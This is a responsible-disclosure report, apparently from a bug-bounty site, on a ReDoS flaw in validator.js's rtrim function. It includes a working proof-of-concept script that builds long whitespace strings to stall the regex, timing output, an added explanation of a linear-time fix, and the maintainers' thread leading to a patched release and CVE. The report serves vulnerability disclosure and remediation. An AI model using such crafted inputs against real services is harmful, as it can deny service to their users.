Inefficient Regular Expression Complexity in validatorjs/validator.js

Valid

Reported on

Sep 21st 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It allows causing a denial of service when calling the function 'rtrim'.

The ReDoS vulnerability is mainly due to the regex /(\s)+$/g and can be exploited with the following code.

Proof of Concept

// PoC.js
var validator = require("validator");

// Each iteration builds a longer string of the shape 'a' + spaces + 'a' and
// times a single rtrim call on it; the cost grows quadratically with length.
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = 'a' + ' '.repeat(i * 10000) + "a";
    validator.rtrim(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}

The Output

"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"

Reference

I opened an issue before, but it is still not safe after the fix.

For a repair, you can refer to the rtrim function in the package trim.
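The regex from the report beside a linear-time rtrim that needs no backtracking, as an added example (not validator's own code and not the fix shipped in 13.7.0); the `compare`, `attackString` and timing helpers are assumptions for the demonstration and every input is constructed.

```javascript
// Added example (not validator's own code): the regex rtrim from the report
// beside a linear-time scan that gives the same result without backtracking.
// All inputs below are constructed for the demonstration.

// Vulnerable shape from the report. For every start position inside a run
// of whitespace the engine extends (\s)+ to the end of the run, fails on the
// trailing non-space at $, and backtracks one character at a time, so a run
// of n spaces followed by a non-space costs O(n^2). Dropping the capture
// group does not change that: the unbounded quantifier anchored by $ is
// what makes the engine retry from every position in the run.
function rtrimRegex(str) {
  return str.replace(/(\s)+$/g, '');
}

// Hardened form: walk backwards from the end while the character is
// whitespace, then slice once. Each character is examined at most once,
// so the cost is O(n) for any input.
function rtrimScan(str) {
  let end = str.length;
  while (end > 0 && /\s/.test(str.charAt(end - 1))) {
    end -= 1;
  }
  return str.slice(0, end);
}

// Payload shape used in the report: non-space, long whitespace run, non-space.
function attackString(n) {
  return 'a' + ' '.repeat(n) + 'a';
}

// Run both implementations on the same input and report whether they agree
// and how long each took, so the quadratic blow-up is visible directly.
function compare(n) {
  const input = attackString(n);
  let t = Date.now();
  const fromRegex = rtrimRegex(input);
  const regexMs = Date.now() - t;
  t = Date.now();
  const fromScan = rtrimScan(input);
  const scanMs = Date.now() - t;
  return { length: input.length, equal: fromRegex === fromScan, regexMs, scanMs };
}

for (const n of [5000, 10000, 20000]) {
  const r = compare(n);
  console.log(`length ${r.length}: regex ${r.regexMs} ms, scan ${r.scanMs} ms, same result: ${r.equal}`);
}
```

The scan version is the shape to reach for whenever trimming is done without a caller-supplied character class; when a class is required, bound it or trim by index rather than anchoring an unbounded quantifier at `$`.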

We have contacted a member of the validatorjs/validator.js team and are waiting to hear back 10 months ago
Sarhan Aissi
9 months ago

Thank you Yeting Li for reporting again a vulnerability in our package. Let me investigate the issue and get back to you asap

Sarhan Aissi validated this vulnerability 9 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sarhan Aissi
9 months ago

A PR containing a fix has been created. We will probably make a new release in the next few days including this fix. Thanks again Yeting Li for spotting the ReDoS!

Jamie Slome
9 months ago

Admin


Awesome!

Once the fix has been merged, feel free to confirm the fix on the report, and we can go ahead and publish a CVE 👏

Sarhan Aissi confirmed that a fix has been merged on 496fc8 8 months ago
The fix bounty has been dropped
rtrim.js#L6 has been validated
Sarhan Aissi
8 months ago

Thank you guys! We finally released the fix in validator 13.7.0. We will probably add a security advisory when the CVE is published

Jamie Slome
8 months ago

Admin


CVE published! 🎊

Sarhan Aissi
8 months ago

Advisory published https://github.com/validatorjs/validator.js/security/advisories/GHSA-xx4c-jj58-r7x6 🎉

Yeting Li
8 months ago

Researcher


Hi Sarhan and Jamie, thanks a lot!